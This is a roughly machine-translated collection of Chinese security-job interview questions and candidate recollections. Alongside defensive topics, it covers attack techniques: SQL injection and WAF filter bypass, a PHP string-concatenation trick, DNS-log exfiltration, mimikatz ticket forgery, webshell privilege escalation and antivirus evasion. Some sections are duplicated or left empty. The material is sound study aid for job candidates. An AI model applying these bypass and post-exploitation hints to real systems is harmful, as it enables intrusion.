200 network security interview questions in 2023 (recommended collection)

•  0x09 Alibaba - Alibaba Cloud Security
• 0x0A
• 0x0B byte beating - Wuheng Lab
• 0x0C 58 Tongcheng-Security Engineer
• 0x0D Tencent-Xuanwu Lab
• 0x0E 360-Security Engineer
• 0x0F Kuaishou-Security Intern
• 0x10 Huashun Xinan-Security Service Engineer
• 0x11 Qi Anxin Interview Review
• 0x12 JD.com - Security R&D
• 0x13 Anheng interview review
• 0x14 Zhejiang east coast detection
• 0x15 360-Security Engineer Internship
• 0x16 Internship in a certain front-line laboratory
• 0x17 Tencent-Keen Lab Internship
• 0x18 Interview review of a four-character factory
• 0x19 Internship interview review of a four-character factory
• 0x1A A two-character factory interview review
• 0x1B A security company - security researcher

thank you

Thanks  PolarPeak ,  lalalashenle ,  4ra1n master for sharing!

0x00 ByteDance - Penetration Testing Intern

Byte’s direct referral from friends is very efficient. I submitted my resume in the morning and made an appointment for an interview in the afternoon. It’s painful to have a naked face. It’s recommended to review it before going.

1. Self introduction
2. penetration process
3. How to deal with the pan-analysis problem of subdomain name blasting in information collection
4. How to bypass CDN to find real ip
5. What information will you pay attention to in phpinfo
6. Have you ever heard about permission maintenance?
7. Tell me about a vulnerability that you feel good about, and talk about it
8. How to defend against XSS output to href
9. The principle of samesite defense against CSRF
10. CSRF defense
11. How to defend against CSRF in json format
12. Browser parsing order and decoding order
13. How to bypass the SQL injection of filtering commas
14. How to bypass the comma after filtering limit
15. fastjson-related vulnerabilities
16. Talk about a python-related vulnerability you know (SSTI principle, exploit process, payload-related things) open question and answer

0x01

0x02 Convinced - Vulnerability Researcher Internship

Duration: 15 minutes

1. Self introduction
2. What did you do during your internship in xx
3. Briefly explain the idea of ​​penetration testing
4. What role does the protective net play in it?
5. Some thoughts on the red team
6. Did you do horizontal orientation after taking down the system?
7. Is there any research on log4j some time ago? Can you briefly talk about it?
8. (following the previous question) What are the ways to bypass obfuscation
9. Have you ever understood the memory horse?
10. Have you ever heard of tools like Ice Scorpion and Godzilla?
11. Did you study any attacks when you were in the attack team, such as researching some tools or magic modification?
12. With so many vulnerabilities and attacks, which one is better at?
13. Let me talk about the reasons for the formation of shiro deserialization and the utilization chain
14. Have you ever learned about some bypass methods? Can you briefly introduce the posture?
15. rhetorical question

0x03

0x04 ByteDance - Security Research Intern

one side

Duration: 50 minutes

1. The position you applied for is a security research intern. Do you know what we mainly do here?
2. Self introduction
3. Is there any direction that you want to do now? For example, the code audit you wrote, offensive and defensive drills, and your research direction in school (cryptography) are actually three major directions. Is there anything you want to do now?
   1. Speaking of code auditing and security research
4. Have you reviewed open source frameworks, cms, middleware, etc.
5. The interviewer introduced the job content
6. I see that there are several internship experiences and project experiences on your resume. Let’s talk about the internship experience first. What do you mainly do in A?
7. Talk in detail about what intrusion detection is mainly doing and the problems encountered
8. Have you analyzed the reasons for the large number of false positives generated by intrusion detection, and is there a better solution?
9. Compared with A, B should be more aggressive, right? There are wars (fog, the interviewer seems to have said so) and code audits. Let’s talk about what you mainly do in B.
10. The steps and ideas of reviewing the expression engine
11. The audit you mentioned just now sounds similar to the audit of ordinary development. It is done through program flow and documents. Have you audited some projects from the perspective of security?
12. How xxe is caused, from the code level
13. I see that your resume has a lot of offensive and defensive drill experience, right? Is there any one of these offensive and defensive drill experiences that is more impressive? Pick one and talk about it
14. It seems that your attack is more about using weak passwords. Do you have some more skillful methods?
15. How is the webshell uploaded by this avatar uploaded?
16. What other ways of testing are there? How to bypass it?
17. The log4j vulnerability is very popular these two days, have you checked it out?
18. The interviewer finally introduces the business
19. Questions

One side plus-safety research and development intern

It’s a very strange plot. After the interview, the interviewer told me that there was a base in Beijing and Shenzhen and asked me if I wanted Shenzhen. I said yes. After more than a week, the hr told me that because my interviewer was from Beijing, and then I I chose Shenzhen, so I made another appointment without counting.
Then thank-you letter at noon that day, and then I checked the status on the official website, and the process was
terminated . It turned out that it had become a security research and development, and I originally voted for security research...

Duration: 45 minutes

1. Self introduction
2. What did the guard net do
3. Which layer of processing to do, waf? ids?
4. What is the problem encountered, and what is the impressive solution
5. How to solve the situation of too many false positives, what rules have been done to solve this situation
6. Is his intranet false alarm on the office network or the production network?
7. For example, mysql will also execute powershell, how to protect it (I mentioned earlier that many false positives on the intranet are triggered by someone writing a ps script)
8. Have you dug the src
9. When doing offense and defense, do you have any experience in asset collection?
10. A unit may have more than one first-level domain name, how to collect all domain names of a unit, note that it is not a sub-domain name
11. Do you have any other asset collection experience?
12. In addition to information collection, are there any attack cases in terms of vulnerabilities?
13. Talk about sql injection
14. how to defend
15. How to defend against order by
16. When defending with escape characters, what should you do if you encounter database column names or table names with special characters?
17. wide byte injection
18. do you understand ssrf
19. how to fix
20. Based on the repair of the black and white list, docker is basically used in production now, and the ip changes at any time, and everything may be different after restarting docker. How to fix it
21. fastjson deserialization
22. Vulnerabilities of redis
23. Mysql privilege escalation
24. shiro deserialization
25. Log4j is very popular recently, let’s talk about the principle
26. Analysis process and principle of jndi
27. Is there anything you did better that I didn't ask about, you can talk about it
28. General practice introduces the main business of the department
29. routine rhetorical question

two sides

Immediately after one side plus, there was an interval of 10 minutes, and the second side started after writing half of the replay on the first side

Duration: 25 minutes

1. Talk about a proud and impressive experience in offensive and defensive drills
2. What are you good at in the field of security?
3. What is generally reviewed, java? python?
4. Do you understand csrf, how to fix it
5. What is the audit process like when you get the code of the java system?
6. How to defend and repair sql injection in java system
7. What does the browser do when a domain name is entered in the browser to access
8. A system's login page, what loopholes may usually appear
9. Do you understand cloud security?
10. Have you ever developed security tools, such as waf or scanners?
11. Conventional introduction business
12. routine rhetorical question

0x05 Chaitin Technology-Security Service Engineer

one side

Duration: 30 minutes

1. Self introduction
2. Has web penetration testing ever been practiced?
3. Talk about the principle of sql injection
4. Have you ever understood the cause of sql injection from the code level (if the code level refers to the sql statement, the answer is yes)
5. If you don’t understand xss, do you understand the principle of xss from the code level
6. Which one is more familiar with owasp top10 vulnerabilities
7. Talk about how to defend against sql injection
8. How does sql injection bypass filtering
9. I asked if xx was a target when defending the net, and whether he has made any research and judgment on the behavior of the attacking team
10. The content of the work when protecting the network in xx, have you ever done research and judgment on traffic packets and data packets?
11. The role played during the school’s offensive and defensive drills, the main work content, the ideas of the penetration test, and the results (this question is quite detailed, specific to the assigned tasks, whether the host computer or domain controller has been taken down, the form and duration of the offensive and defensive drills) time to talk)
12. I usually play a lot of ctf, what are the results?
13. Will you usually pay attention to some novel vulnerabilities, will you do code audits, such as Shiro vulnerabilities, etc. Have you ever reproduced vulnerabilities?
14. Do you know anything about phishing emails?
15. What is the current direction of study
16. Finally, introduce the talent demand
17. Questions

two sides

Duration: 34min

1. Self introduction
2. Which language do you prefer to learn code auditing? which language are you good at
3. Get a php code for audit, what is the audit process like?
4. Are you familiar with the PHP development framework? Such as ThinkPHP these
5. If the source code given is the ThinkPHP framework, what is the difference between the audit and the one that does not use the framework, in terms of process or focus?
6. What are the native sensitive functions of php, for example, which ones will be searched if you search for keywords?
7. Do you understand the deserialization vulnerability?
8. When deserializing, when unserialize() deserializes a string, some magic methods of the object will be automatically called. When looking for the deserialized chain, which magic methods can be used as a starting point to find
9. Have you ever audited actual projects, such as some open source cms on github
10. Can we talk about java auditing?
11. Have you ever done a complete project when doing infiltration before, except for ctf
12. Can you tell me about the bugs you found and how you found them?
13. Are you familiar with vulnerabilities like ssrf? Tell me about the principle and how to use it
14. What can we do with ssrf and what effect can we achieve
15. In the php environment, how to make the most of ssrf, get the shell or enter the intranet
16. How to use the machine in the intranet to request the service in the intranet
17. Suggestions for repairing ssrf vulnerabilities, what details need to be paid attention to when repairing
18. If you use the whitelist strategy to repair ssrf, take out the target to be accessed from the variable input by the user, what should you pay attention to, because some urls will bypass the whitelist through special characters, what should you pay attention to in the operation of getting variables detail?
19. What is the difference between three equal signs and two equal signs in php
20. How to find common entry functions in PHP code
21. There are some php development frameworks that can help us do some url routing. Are you familiar with these routing methods?
22. Introduce variable coverage in PHP
23. There is a php program that allows the operation of file inclusion. At the same time, if you want to avoid file inclusion vulnerabilities, what should you pay attention to when writing code?
24. Remote file inclusion and local file inclusion, what are the php settings involved in these two
25. Can the local file contain the path contained in the restricted file through php configuration (not directly through the code to solve the configuration item)
26. PHP, Java code audit is particularly familiar with which vulnerability
27. What methods does php have when doing sql injection defense
28. java defense against sql injection
29. Do you understand the secondary injection of sql? Can you introduce it?
30. How to prevent secondary injection when writing code

0x06 Tianrongxin interview review

Duration: 15~20 minutes

1. Have you ever done a penetration test in a real-world environment? Have you submitted the src yet?
2. How much do you know about anti-kill technology, can the Trojan horse you make pass 360
3. ctf score? What kind of questions are you good at?
4. What are the results of offensive and defensive drills?
5. Do you understand the shiro vulnerability? Tell me about the principle
6. Under linux, there is a txt text file with a large number of IP addresses, but there are many duplicates in it, how to quickly remove the duplicates?
7. In the intranet penetration, the host authority was obtained through phishing emails, but it was found that the intranet intercepted the outbound traffic of tcp. Let’s talk about how to communicate at this time?
8. What is your coding ability? Have you ever done a code audit?
9. What direction are you currently interested in?

0x07 Tencent-Security Technology Intern

Duration: 15 minutes

1. Self introduction
2. Do you understand sql injection? Tell me about the principle of secondary injection
3. How to fix the secondary injection
4. Do you understand that sql has been injected into waf? If a sql injection filters the information keyword, how to bypass it?
5. Redis unauthorized access
6. A complete process of penetration testing
7. When playing ctf, did you encounter any particularly impressive questions?
8. Is there a better way to exploit the file download vulnerability?
9. Use the file download vulnerability to find the file name. Specifically, what file name to look for (which files are generally read when reading a file) (in ctf? in actual combat?)
10. Command execution vulnerability, what is the better way to deal with http not going online (speak a little more)
11. Continuing from the previous question, communicate through tunnels, explain in detail what type of tunnels are passed through, and talk about specific operations
12. Vulnerability warning
13. Have you ever reproduced a middleware type vulnerability (whether you have reproduced a complete vulnerability)
14. What are the main responsibilities of the role played in the school's offensive and defensive drills?

0x08 Xiaopeng Motors-Safety Engineer

Length: 37 minutes

1. Self introduction
2. Have you ever dug up the src?
3. How do you usually learn web penetration? Is there any actual combat? Have you ever successfully found a vulnerability?
4. What tools have you been exposed to when doing web penetration
5. What is the xxe vulnerability? What is ssrf?
6. When playing ctf, what direction are you responsible for?
7. Why do you want to engage in information security, how much interest do you have in security, whether you will change careers in the future, or plan to continue working in security
8. How do you usually learn about safety? If you were asked to take a new direction (app safety), how much time would you spend on learning, or do you have a direction you want to do?
9. Talk about the process of code audit
10. How do you usually do code auditing?
11. Have you audited open source frameworks and CMS?
12. How to judge whether a database is mysql or oracle?
13. Types of sql injection and how to use it?
14. Talk about the principle and defense ideas of sql injection
15. What language did you use for development?
16. What framework did you use when doing java development? Can you do java security development?
17. Have you ever done Android development?
18. Have you ever written a tool in python?
19. Which vulnerability is used by msf, and has it successfully rebounded?
20. What did you mainly do when protecting the network, and talk about your understanding of security products
21. The company now needs someone who can do app security. If you want to do it now, will you learn it, or are you interested, or do you have other things you want to do? If you don’t want to do app security, how much time can you spend learning
22. Do you understand intranet penetration? Talk about the idea of ​​intranet penetration

---

Next, from 0x09~0x0B are the face-to-face scriptures of the same blogger, and they were posted on Niuke. After reading it, I felt very good and then turned around. I will also attach some links to interview questions/study notes of this blogger. Personally I feel very good
CSDN network security - common interview questions
CSDN network security - self-study notes

0x09 Alibaba - Alibaba Cloud Security

one side

1. Introduce yourself, talk about the project and extracurricular practice?
2. Has the backend API of the WAF management platform been stress tested?
3. Has your current paper been published?
4. What is your dissertation?
5. What is the biggest gain in the ByteDance training camp?
6. Is there any meaningful thing to share during graduate school or in daily life?
7. What is the time complexity of quicksort?
   1. What is the fastest case? What is the situation?
   2. What is the slowest case? What is the situation?
8. What solutions are there for hash collisions?
9. Programming questions (easy)

two sides

1. Introduce yourself?
2. We are a password management service here. How much do you know about passwords?
3. Do you prefer security research or security R&D in your future plans?
4. Are you interested in the security and identity authentication capabilities of PKI on the cloud?
5. Tell us about what the ByteDance training camp has done?
   1. What are the principles and defense schemes of Sql injection?
   2. What is the principle of WAF protection against SQL injection?
   3. In this training camp, how did you work together? what is your role What is your contribution? Is there any possibility of improving efficiency?
   4. Is vulnerability mining a pure tool or some manual work?
   5. What are the functions of the backend API of the WAF management platform?
   6. Is there a large amount of data added, deleted, modified, and checked by WAF?
   7. What problem does Redis solve?
   8. How to ensure the consistency between redis and db for hot data?
   9. How is user login authentication done?
   10. How to protect the security of Token?
   11. How should the content of Token be designed?
   12. How to ensure that the data is not tampered with?
6. Ideas for SDN vulnerability mining?
   1. Has the vulnerability mining found an RCE vulnerability?
   2. Is there any research on stack overflow and heap overflow?
7. Tell me about the process of the https protocol?
   1. How many random numbers are there?
   2. What if there was one?
8. Are you familiar with C++ or C?
9. The principle of hash table and conflict resolution? (repeated with one side)
10. Why is Mysql query fast?
    1. Four characteristics of transactions, mysql isolation level?
    2. Explain optimistic locking and pessimistic locking?
11. Have you ever been involved in multi-concurrent programming?
    1. Have read-write locks and mutex/exclusive locks been used? What's the difference? Why use it?
12. There is a software copyright, what software do you make?
13. Programming questions (medium)

Three sides (intersecting sides)

1. Solution to ByteDance training camp ultra vires problem?
   1. Do firewalls write their own rules to defend?
   2. The task is the same, you won the first place, where is your team doing well?
2. SDN vulnerability mining project, can you list a more technical vulnerability? Vulnerability principle and mining process?
3. The difference between Python2 and Python3?

• What do Xrange and range return?

1. The role of database index? Changes in mysql index?
2. The database password is weak, how to elevate the privilege after logging in?
3. When you write your own project, how do you defend against SQL injection?
4. How to conduct CSRF defense?

• What does Token encrypt?
• Check what?
• Why does Token need to be encrypted?
• Is it okay to use plaintext random numbers?

1. How to prevent replay attacks?
2. What are the security benefits of Docker?
3. Personal development direction?
4. Where is the current daily practice?
5. How long have you been an intern? Why do you want to come to Ali?

0x0A

0x0B byte beating - Wuheng Lab

---

1. Self introduction
2. Introduction to Alibaba Internship?
3. Venus Star Internship Introduction?
4. Is the message queue self-developed or open source? What is your name?
5. Task issued? condition monitoring
6. How to write the subdomain scanning plugin?
7. How to write the fingerprint identification plug-in?
8. How does wappalyzer perform fingerprint recognition?
9. CSDN's XSS vulnerability mining process?
10. The principle of SQL injection?
11. What are the current ways to defend against SQL injection?
12. Which SQL statements cannot be precompiled?
13. How does SQL injection determine the injection point?
14. It is known that http://example.com/?id = 1 is mysql, how to get the mysql version?
15. What to do when there is no echo? ceye dnslog takeaway
16. What about takeout?
17. The principle of CSRF?
18. How to attack when CSRF uses POST request? hide form
19. Not a form?
20. AJAX send POST request?
21. How many packets will Ajax send a POST request?
22. Let you write a CSRF attack plug-in, how do you write it? What modules are included?
23. The principle of SSRF?
24. Let you write an SSRF plug-in, how do you write it?
25. Questions

0x0C 58 Tongcheng-Security Engineer

---

1. Please introduce yourself first

Suppose there is a SQL injection as follows

select * from user where userid = {};

1. How to inject in this case?
   1. There is no return content in the response
   2. 1s will time out, return directly to the 404 page
2. For example, I write a security SDK

How to write the repair of sql injection (pseudo code)

1. 1. Answer: I tend to use the precompiled way

But if it is pre-compiled, what should I do if R&D may not use it? That is, if he thinks it is too troublesome to change it, can it be more convenient. Because if it is pre-compiled, I have to change every SQL and every query.

1. 1. A: How about designing a whitelist?
   2. Then you can roughly write about how to design a whitelist. You can divide it into scenarios, such as SQL injection in what scenario and what scenario, or what operations should be done in the parameters
   3. How to write xss repair (pseudo-code) Answer: escape with entity

But we have a scenario, you see here where we upload resumes, sometimes it supports uploading html resumes, right. Its own business needs to use html, if you use html entity escape, it will all be escaped , Then the business will collapse if this is the case, right? In this case, how do we write an xss filter, or escape, to solve this scenario similar to a resume. You can think about it, It doesn't matter if you can't write code.

1. 1. A: Whitelist restriction, blacklist filtering.
   2. In fact, we do this ourselves. For this situation, we will first make a whitelist of html tags, and the second is a whitelist of events. We will not do blacklists.

RCE repair, how to write (pseudo-code) (java or python command execution) Answer: Whitelist restriction, only the required functions are allowed. But for RCE, I feel that in business scenarios, generally speaking, it is not easy for interviewers to appear : Well, we have appeared a lot. Especially in the operation and maintenance department.

1. 1. Me: I play a lot of CTF, and the RCE I know is all about PHP. For example, system, popen, etc. Generally speaking, it is directly filtered

Then these functions in PHP are all blacklisted, what else can you do

1. 1. Answer: string concatenation $a=p.h.p.i.n.f.o()

Have you ever used backticks in php?

1. 1. Answer: There are also  chr() functions to bypass
   2. Interviewer: Coding, right?
   3. How to write the repair of xxe (pseudo-code) Answer: For XXE, I only know its attack method, and I don’t know much about its defense. The attack method is to do XML external entity injection. An attack template can be read file, can be executed as a command
   4. How does XXE execute commands? Take php as an example, how does XXE execute commands
   5. The execution of the XXE command requires its server itself to support some special protocols, which is generally not possible

Have you learned about tools for automated code auditing, similar to fortify?

1. Answer: I only used the older one, I can't remember (referring to seay)

It doesn't matter, then have you learned about some of his principles and roughly how to do it?

1. Me: His principle is generally to locate the position of the function that may have a loophole by matching some special functions

But in this case, the false positives are very high, just like my RCE, if you directly match, many of them are false positives, and many of them are not web-based.

1. Me: Another way is to add some custom rules to him

Is there a better way? We can't accept too many false positives.

1. Me: I have an idea, after he has matched himself, can he verify it again from the front end at the level of a black box
2. For black-box verification, I have a need. First of all, I have to know, first of all, which entry of my function in my php is passed in, right. But this may have been called layer by layer, and it may even be this kind include()of , In this case, for me, I don't know which entrances he has affected, what should I do in this situation
3. Does your school learn the principles of compilation?
4. In fact, I think security majors still need to learn the principles of compilation.
5. Have you ever engaged in this kind of post-infiltration related to linux?
   1. Interviewer: For example, this linux has been compromised by me, I want to get more information, such as some horizontal information, have you ever messed with me: I don’t know much about this, but I know a little about windows
   2. Interviewer: Then you can briefly talk about it. For example, you first compromise a Windows machine, and then I want to do some horizontal movement in this Windows domain. I want to get the authority of this Windows domain. This kind of you How to do it I: Forged bills, silver bills and gold bills Interviewer: How do you do this bill forgery Me: Generally, you can use mimikatz
   3. Interviewer: What mimikatz captures are the passwords in the memory and some other tickets, so if I am low-privileged, I can’t capture the passwords, or the user passwords I capture are not domain accounts, yes What about a low-privilege account. Because most of the penetration is an application, the application may not have domain authority. I: Raise from low authority
   4. Interviewer: Then how do you usually elevate rights? I: Generally, there are loopholes in windows. Interviewer: Then use this windows system to elevate privileges. I have a webshell now, so how do I elevate privileges?
   5. Interviewer: You can do this, you upload a script or exe that escalates privileges, and if you run the exe in webshell, it will elevate the privileges of the web application
6. So is there any last thing you want to ask me?

0x0D Tencent-Xuanwu Lab

1. Self introduction
2. Explain the principle of CSRF
3. when to contact web security
4. Why learn WEB security
5. Which competitions have you participated in?
6. you played that role
7. Let's talk about deserialization
8. Tell me about the major security issues that you have paid attention to recently.
9. Then tell me about the best impression you had.
10. I see black box testing on your resume, tell me about it
    1. One is the test of the wallet and the other is the test of the exchange. The wallet is mainly for information leakage, and the level exceeds the authority
11. how did you find out
    1. Information leakage means that webpack can directly view call information such as api, and horizontal overreach means that the construction of josn packages returns user data, account passwords, etc.
12. how is it constructed
13. Let's move on to the exchange
14. (Blockchain related) Talk about the instruction set of receiving parameters involved in the reverse function
15. Talk about reentrancy vulnerabilities
16. Do you know anything about the biggest blockchain security incident recently?
17. OK, so what is your exposure to cryptography?
18. I see that your resume has many audits on Defi, so do you have any experience in mining vulnerabilities?
19. Well, now let me ask you a question. Think about how to find possible loopholes in the various economic models established in the DEFI project.
20. Tell us about your guesses about new types of vulnerabilities that may appear in the future
21. There is a game that rewards you for guessing the correct answer
22. rhetorical question

0x0E 360-Security Engineer

1. Self introduction
2. WAF and how to bypass it
3. IPS/IDS/HIDS
4. cloud security
5. How to bypass Security Knight/Safety Dog, etc.
6. Gopher expands the attack surface
7. Struct2 Vulnerabilities
8. UDF privilege escalation
9. DOM XSS
10. database privilege escalation
11. How to play Redis
12. Intranet penetration
13. container security
14. k8s docker escape
15. Linux, windows commands: filter files, view process environment variables
16. How to get webshell for site library separation

0x0F Kuaishou-Security Intern

one side

1. Self introduction
2. ask item
3. A lot of detailed questions were asked about the project, and it is not convenient to disclose them. The general questions are as follows:
4. Did you encounter any problems when working on the project and how to solve them?
5. What did you learn from the project?
6. Is there any place in the project that has been optimized by yourself?
7. Have you done a penetration test on the website?
8. Are you familiar with Linux operation, how to see the process PID
9. What kind of database have you used? Answer: sqlite, mongodb, the interviewer doesn’t seem to know much about it, so why don’t you ask?
10. Why use mongodb
11. Do you know ES (Elasticsearch)
12. HTTPS establishment process
13. How does python manage memory
14. The difference between deep copy and shallow copy
15. Are python multi-processes, multi-threads, and coroutines useful? Where are they used?
16. Can python achieve true multithreading
17. Code question: ip sorting

(Just convert it to tuple sorting, remember to convert str to int, otherwise 192 will be greater than 50)

输入：iplist = ["1.1.1.1","192.168.1.110","10.192.2.4","10.50.2.3","10.50.2.10","111.120.12.1","172.18.5.112"]
输出：
1.1.1.1
10.50.2.3
10.50.2.10
10.192.2.4
111.120.12.1
172.18.5.112
192.168.1.110

1. How to prevent SQL injection when writing Web API
2. How to prevent XSS
3. Do you understand the vulnerability of unauthorized access? Have you ever dug the vulnerability of unauthorized access?
4. Is there anything I'm good at that I haven't asked yet?

two sides

1. ask item
2. Which part of the project takes more time
3. How to trace the source of the attack
4. Give an example of traceability attack
5. How to detect webshell
6. What is the difference between sql injection in mysql and sqlserver
7. Are you looking for a security development position or a security research position?

Code question: mobile phone Jiugongge keyboard, input numbers, output all letter combinations

1. Such as input 23, output ['ad','ae','af','bd','be','bf','cd','ce','cf']
2. Talk about the role of the DNS protocol, the resolution process
3. Security Issues of DNS Protocol
4. internship period

0x10 Huashun Xinan-Security Service Engineer

1. Self introduction
2. Red and blue team experience
3. What to Know About the Shiro Vulnerability
4. Tell me about your app testing experience
5. What framework does xposed use? Have you written app decryption yourself?
6. Causes of Xss, SSRF, and SQL, and repair solutions?
7. What to do if you Xss hit the background and find that it is from the intranet
8. Suppose you are given a target station, what would you do?
9. How much do you know about escalation of privileges in linux and windows?
10. Will it be process injection?
11. How many emergencies have you done?
12. Tell me about what you do in an emergency for windows and linux
13. Have you used our goby and fofa?
14. Will the apk be decompiled?
15. How is your python level?
16. how did you check your php

---

0x11 Qi Anxin Interview Review

1. MVC framework in detail
2. Introduce sql injection in detail
3. The difference between xss and csrf
4. The principle of csrf and how to prevent it
5. Is there anything else you're good at that wasn't asked?
6. Tell me about the principle of xxe
7. What functions will xxe use
8. File upload, explain in detail
9. What are the common web containers
10. How to bypass the Apache 7.0 file upload blacklist, explain in detail
11. What are the symmetric ciphers and asymmetric ciphers in cryptography?
12. Is md5 symmetric encryption
13. Can apache execute php files
14. Which databases to know
15. Talk about the principle of deserialization
16. What functions will be used for deserialization
17. Have you ever fought in xxe
18. java multithreading
19. What projects did python have and what did they write
20. Where did python learn before

0x12 JD.com - Security R&D

1. First ask questions based on your resume
2. Ask me how one of my projects has been completed, //in the resume
3. How about the basics of Java,
4. Have you written some tools yourself?
5. Have you ever thought about writing a scanner in the future?
6. The simple principle of sql injection and how to defend it
7. Have you ever learned about deserialization, especially in the direction of Java?
8. How much data structure do you remember
9. What types of vulnerabilities does src mainly mine?
10. How about understanding the MSF framework
11. What databases do you mainly understand, and what databases do you mainly learn
12. The principle of ssrf and its defense ---> This is in-depth

0x13 Anheng interview review

1. What is the parameter for sqlmap to burst out the current library name?
2. What are the parameters of the namp detection system ---> uppercase or lowercase
3. What is the lowercase o and a of namp?
4. What is the specific statement of Boolean blind injection
5. The principle of wide bytes
6. Does python deserialize
7. The difference between get pass and post pass parameters
8. What are the request methods of Http
9. How to determine the role of CDN and CDN
10. How to confirm the real IP of the server
11. Describe the information collection process in detail
12. How to confirm that a string of codes is base64
13. What is the principle of fence password
14. How to distinguish between base64 and md5
15. What is the default port of oracle
16. Where is the mysql administrator password generally placed?
17. If the substr() function is disabled, how many replacement functions do you have in mind
18. How to get redis, which port, specific statement, specific operation
19. How to know the other party's IP through email
20. Talk about the same-origin policy
21. How to collect webmaster email addresses and more
22. What are the dangers of ssrf
23. How to defend against ssrf-->A deeper question---->It is recommended to learn more about it
24. How to distinguish between two files in Linux (I forgot which two files are specific)
25. The MSF framework asks a little deeper
26. What are the parsing vulnerabilities and principles of the web container (middleware)
27. How to prevent sql injection ---> This question is very deep

0x14 Zhejiang east coast detection

1. xss tag
2. Tell me about the things you are most proud of in the past few years in college
3. Briefly talk about sql injection
4. Talk about offset injection
5. Tell me about the types of questions you do on ctf
6. The ctf questions of the more difficult web questions encountered
7. Do you understand xxe? Have you audited it yourself?
8. Talk about deserialization
9. bypass say
10. If you were asked to design a waf, how would you design it
11. Do you understand intranet penetration and privilege escalation?
12. Which src are usually mined
13. Have you ever written some scripts by hand?
14. Talk about sql injection, how to manually explode all library names

0x15 360-Security Engineer Internship

1. Self introduction
2. WAF and how to bypass it
3. IPS/IDS/HIDS
4. cloud security
5. How to bypass Security Knight/Safety Dog, etc.
6. Gopher expands the attack surface
7. Struct2 Vulnerabilities
8. UDF privilege escalation
9. DOM XSS
10. database privilege escalation
11. How to play Redis
12. Intranet penetration
13. container security
14. k8s docker escape
15. Linux, windows commands: filter files, view process environment variables
16. How to get webshell for site library separation

0x16 Internship in a certain front-line laboratory

technical side

1. Interviewer: Hello, I heard that you have a strong desire to join our company. Why? Me: Because I have cooperated with your company's personnel in the project, I feel that whether it is technology, hardware or treatment, it is considered first-class in the circle
2. Interviewer: Then do you know our laboratory? Me: I have learned about it, Barabara said something
3. Interviewer: Then let me introduce to you the direction of the laboratory, which is divided into three directions... Me: Okay, I understand
4. Interviewer: Have you ever used our company’s equipment in the project, and how do you feel about the experience (meaning let’s talk about the advantages and disadvantages of the equipment) Me: Then I will tell the truth?
5. Interviewer: No problem, I just want to hear your opinion Me: I have used..., the advantage is that it has good performance and can detect more threat intelligence and the like (let’s make up your mind), but the lack of it is Threats detected and analyzed cannot give specific traffic segments, and it is impossible to effectively determine attacks through a device. Without traffic characteristics, it is not easy to link with other full-traffic devices. It may be the protection mechanism of the device's exit, and the protection signature database is not good. was leaked.
6. Interviewer: Do you know the principle and development process of mainstream equipment?
7. Interviewer: Did you do traffic analysis in the project, right? Can you tell me about your specific case: I have assisted in the discovery of 0day in the national hvv, and I have independently discovered frp rebound timing confirmation packets to send out traffic, shiro deserialization and other vulnerabilities (I mainly talked about my discovery of frp rebound ideas and processes)

Interviewer: In addition to these regular feature discovery, do you have any quick determination method? Me: (Let me share with you my own traffic analysis experience) 1. Determine the type of event (determine what kind of attack the event is, such as sql injection and blasting and frp traffic analysis steps are different) 2. Determine the time of the event , first define a time period 3. Determine the data flow, whether we want to look at HTTP, TCP, or ssh for the data flow of the attack 4. Analyze whether it is an internal network—> external network or external network—> internal network, internal network and external network There are two query methods. The correct query can effectively obtain results by analyzing fewer data packets. For example, after the internal network -> external network is determined, the first step must first check the traffic of the external network ip to judge the behavior of the external network —>Intranet usually takes down an external network server as a springboard. We must first analyze the victim server on the internal network to see if it has been successfully attacked

首先我们需要确定到攻击行为后，再深入的流量分析和应急响应，很多都是误报        数据包的大小也是分析的条件，分析SSL数据包需要解密        爆破攻击：        SMB,SSH,MSSQL等协议比较多，看包的大小，成功登陆的包很大        看ACK，SYN包的次数，如果成功至少20起步，放到科莱上为40起步，但是注意不是失效包和重传的包（注意加密流的ack和syn包也很多，为客户端一次，服务端一次）        重传攻击：        如果一个数据包非常大，几个G或者一个G，我们就考虑数据包是否进行了重传，然后查看数据包的重传数，打个比方就是刷新，如果短时间重传数非常多，就为机器操作，判定为攻击        我们发现一个攻击（如平台登录后的sql注入）我们可以通过流量回溯装置抓取那个被登录用户的用户名和密码，登录平台后自己利用发现的payload进行尝试，看是否能注入成功

1. Interviewer: I heard that you also worked as a red team? What project was it and what was your role in it? Me: I introduced my project experience, and then said that I was an assaulter in charge of RBI in the red team (we were fighting alone without backup, and there were no players who were good at intranet)
2. Interviewer: Tell me about the results of your project I:  …
3. Interviewer: Tell me about the problems you encountered in the project. Me: We took down the webshell of a Ruijie router through exp, but it got stuck on the rebound shell and couldn’t rebound.
4. Interviewer: Then tell me, have you thought about this problem after the end of the project, have you consulted others, and what is the solution? (I feel that I really attach great importance to thinking and problem solving, and attach great importance to the closed loop of the project) Me: I have asked friends who have also taken Ruijie routers, and then I think that the database and website are separated, and then I can only take down the webshell permissions
5. Interviewer: How do you quickly and accurately determine assets? Me: Through fofa, Google Grammar, Zhong Kui's Eye, some registration information
6. Interviewer: What is the grammar of fofa?
7. Interviewer: How do you quickly identify vulnerabilities in these assets? Me: The fastest way is that the scanner scans once first, and then collects information and conducts targeted attacks, or we use fofa syntax to collect targeted information in the asset table to see if there is a special cms or oa system....
8. Interviewer: General scanning will ban you, what will you do? I: My first choice is to use ip pool proxy, or use 5g
9. Interviewer: Your information collection and attacks are not very efficient. After the project is over, have you thought about the solution? Fusion, but not written (again the pain of bad code)
10. Interviewer: Have you ever learned about the national hvv red team's technology of hiding traffic through the firewall? Me: I have learned about it, but I am not very good at it, and I have no place to learn it (a bit embarrassing)
11. Interviewer: Do you have any special methods when you manage points? Me: In addition to searching for the characteristic oa system, we will also collect the mail system in the asset, collect information and log in to the mail system, collect various configuration files, database files, and log in to the background of the website. We have successfully logged into two backgrounds of the website and one mail system , also won a few oa
12. Interviewer: Are you targeting specific OAs because of 0days? (laughs) Me: Our team has 0adys and half-days of these OAs
13. Interviewer: How about the development side? Can I start developing directly? Me: Python can also develop a few small tools by itself, but Java can only be understood (it’s so embarrassing that I can’t really do it, maybe it’s because I haven’t learned security long enough, I originally wanted to focus on code this year)
14. Interviewer: It means that you can only develop a few simple scanning scripts, right (everyone must learn to code well) Me: Yes (embarrassed smile), recently I am learning to use pos3 to write poc
15. Interviewer: If you come for an internship, what kind of learning do you want to do? Me: (I chose a direction that is biased towards defense, because I know that I should not be good enough in attack, and I am very self-aware) Then there are some inquiries about how many months I can work and when I can arrive

In summary, I think the interviewer thinks my shortcomings are that the red team’s attack and information collection efficiency is not high and needs to be improved, and there may be a lack of project reflection and solution ideas

hr noodles

